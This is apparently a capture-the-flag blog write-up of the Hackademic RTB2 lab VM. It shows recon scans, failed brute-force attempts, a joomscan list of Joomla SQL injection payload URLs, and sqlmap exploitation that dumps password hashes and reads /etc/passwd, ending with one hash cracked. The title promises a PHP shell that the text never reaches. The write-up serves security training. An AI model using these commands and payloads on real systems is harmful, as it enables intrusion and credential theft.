Thursday, 14 November 2013

Hackademic RTB2 (to php-shell)

root@kali:~# netdiscover

 Currently scanning: 192.168.62.0/16   |   Screen View: Unique Hosts                                                                                        
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.56.1    08:00:27:00:e0:df    01    060   CADMUS COMPUTER SYSTEMS                                                                                   
 192.168.56.100  08:00:27:4d:e2:d8    01    060   CADMUS COMPUTER SYSTEMS                                                                                   
 192.168.56.105  00:0c:29:74:b5:21    01    060   VMware, Inc.                                                                                              

root@kali:~# unicornscan 192.168.56.105
TCP open                http[   80]        from 192.168.56.105  ttl 64
Main [Error   chld.c:53] am i missing children?, oh well
root@kali:~# nmap -sS -sV -O 192.168.56.105 -pT:80

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 08:56 CET
Nmap scan report for 192.168.56.105
Host is up (0.00039s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.14 ((Ubuntu))
MAC Address: 00:0C:29:74:B5:21 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.17 - 2.6.36
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.48 seconds
root@kali:~# nikto -host 192.168.56.105
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.105
+ Target Hostname:    192.168.56.105
+ Target Port:        80
+ Start Time:         2013-11-13 08:57:17 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.14 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.7
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/2.2.14 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 413560, size: 5108, mtime: 0x438c0358aae80
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2013-11-13 08:57:33 (GMT1) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# cd /usr/share/dirb
root@kali:/usr/share/dirb# dirb http://192.168.56.105/

-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Wed Nov 13 08:57:58 2013
URL_BASE: http://192.168.56.105/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592                                                         

---- Scanning URL: http://192.168.56.105/ ----
+ http://192.168.56.105/cgi-bin/ (CODE:403|SIZE:290)                                                                                                        
+ http://192.168.56.105/check (CODE:200|SIZE:324)                                                                                                           
+ http://192.168.56.105/index (CODE:200|SIZE:1324)                                                                                                          
+ http://192.168.56.105/index.php (CODE:200|SIZE:1324)                                                                                                      
==> DIRECTORY: http://192.168.56.105/javascript/                                                                                                            
==> DIRECTORY: http://192.168.56.105/phpmyadmin/                                                                                                            
+ http://192.168.56.105/server-status (CODE:403|SIZE:295)                                                                                                   
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/javascript/ ----
==> DIRECTORY: http://192.168.56.105/javascript/jquery/                                                                                                     
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/phpmyadmin/ ----
+ http://192.168.56.105/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)                                                                                        
+ http://192.168.56.105/phpmyadmin/index.php (CODE:200|SIZE:8625)                                                                                           
==> DIRECTORY: http://192.168.56.105/phpmyadmin/js/                                                                                                         
==> DIRECTORY: http://192.168.56.105/phpmyadmin/lang/                                                                                                       
+ http://192.168.56.105/phpmyadmin/libraries (CODE:403|SIZE:302)                                                                                            
+ http://192.168.56.105/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)                                                                                            
+ http://192.168.56.105/phpmyadmin/setup (CODE:401|SIZE:481)                                                                                                
==> DIRECTORY: http://192.168.56.105/phpmyadmin/themes/                                                                                                     
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/javascript/jquery/ ----
+ http://192.168.56.105/javascript/jquery/jquery (CODE:200|SIZE:120763)                                                                                     
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/phpmyadmin/js/ ----
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/phpmyadmin/lang/ ----
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/phpmyadmin/themes/ ----
==> DIRECTORY: http://192.168.56.105/phpmyadmin/themes/original/                                                                                            
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/phpmyadmin/themes/original/ ----
==> DIRECTORY: http://192.168.56.105/phpmyadmin/themes/original/css/                                                                                        
==> DIRECTORY: http://192.168.56.105/phpmyadmin/themes/original/img/                                                                                        
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/phpmyadmin/themes/original/css/ ----
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/phpmyadmin/themes/original/img/ ----
                                                                                                                                                            
-----------------
DOWNLOADED: 45920 - FOUND: 11

Browsed in Iceweasel: http://192.168.56.105/ and http://192.168.56.105/phpmyadmin/

In Mantra, opened http://192.168.56.105/, pressed Check with POST data capture enabled; that gives the POST body used for sqlmap below:

sqlmap -u "http://192.168.56.105/check.php" --data="username=admin&password=pass&Submit=Check%21" --level=5 --risk=5
[CRITICAL] all tested parameters appear to be not injectable.

http://192.168.56.105/phpmyadmin/Documentation.html?phpMyAdmin=1thocdud4fe6g9a8or6i6as7qaf5ee7a
phpMyAdmin 3.3.2 Documentation

root@kali:~# searchsploit phpmyadmin | grep "3.3"
phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection         /php/webapps/18371.rb

msfconsole
msf > search phpmyadmin
Matching Modules
================

   Name                                         Disclosure Date  Rank       Description
   ----                                         ---------------  ----       -----------
   exploit/multi/http/phpmyadmin_3522_backdoor  2012-09-25       normal     phpMyAdmin 3.5.2.2 server_sync.php Backdoor
   exploit/multi/http/phpmyadmin_preg_replace   2013-04-25       excellent  phpMyAdmin Authenticated Remote Code Execution via preg_replace()
   exploit/unix/webapp/phpmyadmin_config        2009-03-24       excellent  PhpMyAdmin Config File Code Injection


http://192.168.56.105/phpmyadmin/setup
A username and password are being requested by http://192.168.56.105. The site says: "phpMyAdmin Setup"

This is HTTP authentication (a browser credential prompt, not a form), so try medusa's http module against it:

medusa -h 192.168.56.105 -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/phpmyadmin/setup -v 6
...
ACCOUNT CHECK: [http] Host: 192.168.56.105 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: kadence (16690 of 14344391 complete)
GENERAL: Unable to connect: unreachable destination
NOTICE: http.mod: failed to connect, port 80 was not open on 192.168.56.105
GENERAL: Medusa has finished.

medusa -h 192.168.56.105 -u admin -P /usr/share/metasploit-framework/data/john/wordlists/password.lst -M http -m DIR:/phpmyadmin/setup -v 6
...
ACCOUNT CHECK: [http] Host: 192.168.56.105 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: fletching (28231 of 88395 complete)
GENERAL: Unable to connect: unreachable destination
NOTICE: http.mod: failed to connect, port 80 was not open on 192.168.56.105
GENERAL: Medusa has finished.


medusa -h 192.168.56.105 -M web-form -m FORM:"check.php" -m DENY-SIGNAL:"Please try again" -m FORM-DATA:"post?username=&password=&Submit=Check%21" -u admin -P /usr/share/sqlmap/txt/wordlist.txt -v 6
...
medusa -h 192.168.56.105 -M web-form -m FORM:"check.php" -m DENY-SIGNAL:"Please try again" -m FORM-DATA:"post?username=&password=&Submit=Check%21" -u admin -P /usr/share/metasploit-framework/data/john/wordlists/password.lst -v 6
...
GENERAL: Medusa has finished.

Nothing.

Going back to the first step and rescanning:

root@kali:~# nmap 192.168.56.105

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 16:01 CET
Nmap scan report for 192.168.56.105
Host is up (0.00010s latency).
Not shown: 998 closed ports
PORT    STATE    SERVICE
80/tcp  open     http
666/tcp filtered doom
MAC Address: 00:0C:29:74:B5:21 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.23 seconds

root@kali:~# nmap -sS  192.168.56.105 -pT1-65535

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 16:25 CET
Nmap scan report for 192.168.56.105
Host is up (0.00018s latency).
Not shown: 65533 closed ports
PORT    STATE    SERVICE
80/tcp  open     http
666/tcp filtered doom
MAC Address: 00:0C:29:74:B5:21 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds
root@kali:~# nmap -sS  192.168.56.105 -p 1-65535

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 16:25 CET
Nmap scan report for 192.168.56.105
Host is up (0.00011s latency).
Not shown: 65533 closed ports
PORT    STATE    SERVICE
80/tcp  open     http
666/tcp filtered doom
MAC Address: 00:0C:29:74:B5:21 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 20.81 seconds
root@kali:~# nmap -sS  192.168.56.105 -p 1-65535

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 16:26 CET
Nmap scan report for 192.168.56.105
Host is up (0.00012s latency).
Not shown: 65533 closed ports
PORT    STATE SERVICE
80/tcp  open  http
666/tcp open  doom
MAC Address: 00:0C:29:74:B5:21 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 20.85 seconds
root@kali:~# nmap -sV  192.168.56.105 -pT:666

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 16:27 CET
Nmap scan report for 192.168.56.105
Host is up (0.00041s latency).
PORT    STATE SERVICE VERSION
666/tcp open  http    Apache httpd 2.2.14 ((Ubuntu))
MAC Address: 00:0C:29:74:B5:21 (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.38 seconds

Port 666 showed as filtered in the first three scans and open in the fourth; service detection identifies it as a second Apache instance. Its front page, http://192.168.56.105:666/, carries the footer "Powered by joomla 1.5 templates."

root@kali:~# joomscan -u http://192.168.56.105:666/


 ..|''||   '|| '||'  '|'     |      .|'''.|  '||''|. 
.|'    ||   '|. '|.  .'     |||     ||..  '   ||   ||
||      ||   ||  ||  |     |  ||     ''|||.   ||...|'
'|.     ||    ||| |||     .''''|.  .     '||  ||     
 ''|...|'      |   |     .|.  .||. |'....|'  .||.    
   

=================================================================
OWASP Joomla! Vulnerability Scanner v0.0.4 
(c) Aung Khant, aungkhant]at[yehg.net
YGN Ethical Hacker Group, Myanmar, http://yehg.net/lab
Update by: Web-Center, http://web-center.si (2011)
=================================================================


Vulnerability Entries: 611
Last update: February 2, 2012

Use "update" option to update the database
Use "check" option to check the scanner update
Use "download" option to download the scanner latest version package
Use svn co to update the scanner and the database
svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan


Target: http://192.168.56.105:666

Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7


## Checking if the target has deployed an Anti-Scanner measure

[!] Scanning Passed ..... OK


## Detecting Joomla! based Firewall ...

[!] No known firewall detected!


## Fingerprinting in progress ...

~Generic version family ....... [1.5.x]

~1.5.x en-GB.ini revealed [1.5.12 - 1.5.14]

* Deduced version range is : [1.5.12 - 1.5.14]

## Fingerprinting done.


## 3 Components Found in front page  ##

 com_mailto     com_user   
 com_abc   




Vulnerabilities Discovered
==========================

# 1
Info -> Generic: htaccess.txt has not been renamed.
Versions Affected: Any
Check: /htaccess.txt
Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
Vulnerable? Yes

# 2
Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /administrator/
Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
Vulnerable? N/A

# 3
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Exploit: A series of XSS and CSRF faults exist in the administrator application.  Affected administrator components include com_admin, com_media, com_search.  Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities. 
Vulnerable? No

# 4
Info -> Core: JSession SSL Session Disclosure Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /?1.5.8-x
Exploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie.  This can allow someone monitoring the network to find the cookie related to the session.
Vulnerable? No

# 5
Info -> Core: Frontend XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /?1.5.10-x
Exploit: Some values were output from the database without being properly escaped.  Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.
Vulnerable? No

# 6
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Versions effected: 1.5.11 <=
Check: /libraries/phpxmlrpc/xmlrpcs.php
Exploit: /libraries/phpxmlrpc/xmlrpcs.php
Vulnerable? No

# 7
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Versions effected: 1.5.12 <=
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No

# 8
Info -> Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-http_ref
Exploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.
Vulnerable? No

# 9
Info -> Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-php-s3lf
Exploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser.
Vulnerable? No

# 10
Info -> Core: Authentication Bypass Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /administrator/
Exploit: Backend accepts any password for custom Super Administrator when LDAP enabled
Vulnerable? No

# 11
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-path-disclose
Exploit: Crafted URL can disclose absolute path
Vulnerable? No

# 12
Info -> Core: User redirected Spamming Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-spam
Exploit: User redirect spam
Vulnerable? No

# 13
Info -> Core: joomla.php Remote File Inclusion Vulnerability
Versions effected: 1.0.0
Check: /includes/joomla.php
Exploit: /includes/joomla.php?includepath=
Vulnerable? No

# 14
Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
Versions effected: 1.0.13 <=
Check: /administrator/
Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.
Vulnerable? Yes

# 15
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.12 <=
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No

# 16
Info -> CorePlugin: Xstandard Editor X_CMS_LIBRARY_PATH Local Directory Traversal Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /plugins/editors/xstandard/attachmentlibrary.php
Exploit: Submit new header X_CMS_LIBRARY_PATH with value ../ to  /plugins/editors/xstandard/attachmentlibrary.php
Vulnerable? No

# 17
Info -> CoreTemplate: ja_purity XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /templates/ja_purity/
Exploit: A XSS vulnerability exists in the JA_Purity template which ships with Joomla! 1.5.
Vulnerable? No

# 18
Info -> CoreLibrary: phpmailer Remote Code Execution Vulnerability
Versions effected: Joomla! 1.5.0 Beta/Stable
Check: /libraries/phpmailer/phpmailer.php
Exploit: N/A
Vulnerable? No

# 19
Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities
Versions effected: Joomla! 1.5.12
Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
Exploit: While Joomla! team announced only File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296
Vulnerable? Yes

# 20
Info -> CoreComponent: Joomla Remote Admin Password Change Vulnerability
Versions Affected: 1.5.5 <=
Check: /components/com_user/controller.php
Exploit: 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm  2. Write into field "token" char ' and Click OK.  3. Write new password for admin  4. Go to url : target.com/administrator/  5. Login admin with new password
Vulnerable? No

# 21
Info -> CoreComponent: com_content SQL Injection Vulnerability
Version Affected: Joomla! 1.0.0 <=
Check: /components/com_content/
Exploit: /index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Vulnerable? No

# 22
Info -> CoreComponent: com_search Remote Code Execution Vulnerability
Version Affected: Joomla! 1.5.0 beta 2 <=
Check: /components/com_search/
Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B
Vulnerable? No

# 23
Info -> CoreComponent: MailTo SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_mailto/
Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
Vulnerable? No

# 24
Info -> CoreComponent: com_content Blind SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 RC3
Check: /components/com_content/
Exploit: /index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28
Vulnerable? No

# 25
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_content/
Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc).  This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration.
Vulnerable? No

# 26
Info -> CoreComponent: com_weblinks XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_weblinks/
Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms).
Vulnerable? No

# 27
Info -> CoreComponent: com_mailto Email Spam Vulnerability
Version Affected: Joomla! 1.5.6 <=
Check: /components/com_mailto/
Exploit: The mailto component does not verify validity of the URL prior to sending.
Vulnerable? No

# 28
Info -> CoreComponent: com_content view=archive SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1
Check: /components/com_content/
Exploit: Unfiltered POST vars - filter, month, year  to /index.php?option=com_content&view=archive
Vulnerable? No

# 29
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.9 <=
Check: /components/com_content/
Exploit: A XSS vulnerability exists in the category view of com_content.
Vulnerable? No

# 30
Info -> CoreComponent: com_search Memory Comsumption DoS Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /components/com_search/
Exploit: N/A
Vulnerable? No

# 31
Info -> CoreComponent: com_poll (mosmsg) Memory Consumption DOS Vulnerability
Versions effected: 1.0.7 <=
Check: /components/com_poll/
Exploit: Send request  /index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>
Vulnerable? No

# 32
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
Vulnerable? No

# 33
Info -> CoreComponent: com_mailto timeout Vulnerability
Versions effected: 1.5.13 <=
Check: /components/com_mailto/
Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.
Vulnerable? Yes

# 34
Info -> Component: Amblog SQL Injection
Versions Affected: 1.0
Check: /index.php?option=com_amblog&view=amblog&catid=-1UNIONSELECT@@version
Exploit: /index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
Vulnerable? No

# 35
Info -> Component: Component com_newsfeeds SQL injection
Versions Affected: Any <=
Check: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
Exploit: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
Vulnerable? No

# 36
Info -> Component: ABC Extension com_abc SQL
Versions Affected: 1.1.7 <=
Check: /index.php?option=com_abc&view=abc&letter=AS&sectionid='
Exploit: /index.php?option=com_abc&view=abc&letter=AS&sectionid='
Vulnerable? N/A

# 37
Info -> Component: Joomla Component com_searchlog SQL Injection
Versions Affected: 3.1.0 <=
Check: /administrator/index.php?option=com_searchlog&act=log
Exploit: /administrator/index.php?option=com_searchlog&act=log
Vulnerable? No

# 38
Info -> Component: Joomla Component com_djartgallery Multiple Vulnerabilities
Versions Affected: 0.9.1 <=
Check: /administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
Exploit: /administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
Vulnerable? N/A

There are 4 vulnerable points in 38 found entries!

~[*] Time Taken: 44 sec
~[*] Send bugs, suggestions, contributions to joomscan@yehg.net
root@kali:~#

http://192.168.56.105:666/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder=
Restricted access

root@kali:~# nikto -host 192.168.56.105 -port 666
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.105
+ Target Hostname:    192.168.56.105
+ Target Port:        666
+ Start Time:         2013-11-13 16:58:24 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.14 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.7
+ The anti-clickjacking X-Frame-Options header is not present.
+ Cookie 8eb16cd5703c7dc43799386d6dcb4057 created without the httponly flag
+ Server leaks inodes via ETags, header found with file /robots.txt, inode: 147545, size: 304, mtime: 0x41a7982c29d80
+ File/dir '/administrator/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/cache/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/components/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/images/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/language/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/libraries/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/media/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/plugins/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/templates/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ File/dir '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Cookie dc5b33c885319f0ed52b91c702cf76e9 created without the httponly flag
+ File/dir '/xmlrpc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 14 entries which should be manually viewed.
+ OSVDB-39272: favicon.ico file identifies this server as: Joomla
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.1.1:666/images/".
+ Apache/2.2.14 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACK method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /administrator/: This might be interesting...
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /logs/: This might be interesting...
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ /configuration/: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 38 item(s) reported on remote host
+ End Time:           2013-11-13 16:58:56 (GMT1) (32 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


http://192.168.56.105:666/

sqlmap -u "http://192.168.56.105:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" --dbs

available databases [4]:
[*] information_schema
[*] joomla
[*] mysql
[*] phpmyadmin

...

sqlmap -u "http://192.168.56.105:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" -D joomla -T jos_users -C id,username,password --dump

+----+---------------+-------------------------------------------------------------------+
| id | username      | password                                                          |
+----+---------------+-------------------------------------------------------------------+
| 62 | Administrator | 08f43b7f40fb0d56f6a8fb0271ec4710:n9RMVci9nqTUog3GjVTNP7IuOrPayqAl |
| 63 | JSmith        | 992396d7fc19fd76393f359cb294e300:70NFLkBrApLamH9VNGjlViJLlJsB60KF |
| 64 | BTallor       | abe1ae513c16f2a021329cc109071705:FdOrWkL8oMGl1Tju0aT7ReFsOwIMKliy |
| 65 | test          | be384a53bb01ae8acac1ea24dfdd065f:wpMwwAIdOLfdUbnSP9rhynCv0RLQvGQX |
+----+---------------+-------------------------------------------------------------------+


sqlmap -u "http://192.168.56.105:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" --file-read "/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:107::/var/run/dbus:/bin/false
avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:104:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
couchdb:x:105:113:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash
speech-dispatcher:x:106:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
usbmux:x:107:46:usbmux daemon,,,:/home/usbmux:/bin/false
haldaemon:x:108:114:Hardware abstraction layer,,,:/var/run/hald:/bin/false
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:110:115:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:111:117:RealtimeKit,,,:/proc:/bin/false
saned:x:112:118::/home/saned:/bin/false
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
gdm:x:114:120:Gnome Display Manager:/var/lib/gdm:/bin/false
p0wnbox:x:1000:1000:p0wnbox,,,:/home/p0wnbox:/bin/bash
mysql:x:115:123:MySQL Server,,,:/var/lib/mysql:/bin/false


download joomla_cracker.pl

a.pass:
Administrator:08f43b7f40fb0d56f6a8fb0271ec4710:n9RMVci9nqTUog3GjVTNP7IuOrPayqAl
JSmith:992396d7fc19fd76393f359cb294e300:70NFLkBrApLamH9VNGjlViJLlJsB60KF
BTallor:abe1ae513c16f2a021329cc109071705:FdOrWkL8oMGl1Tju0aT7ReFsOwIMKliy
test:be384a53bb01ae8acac1ea24dfdd065f:wpMwwAIdOLfdUbnSP9rhynCv0RLQvGQX

root@kali:~# perl joomla-cracker.pl a.pass /usr/share/metasploit-framework/data/john/wordlists/password.lst
Found hash/plain/user = 992396d7fc19fd76393f359cb294e300:70NFLkBrApLamH9VNGjlViJLlJsB60KF / matrix / JSmith
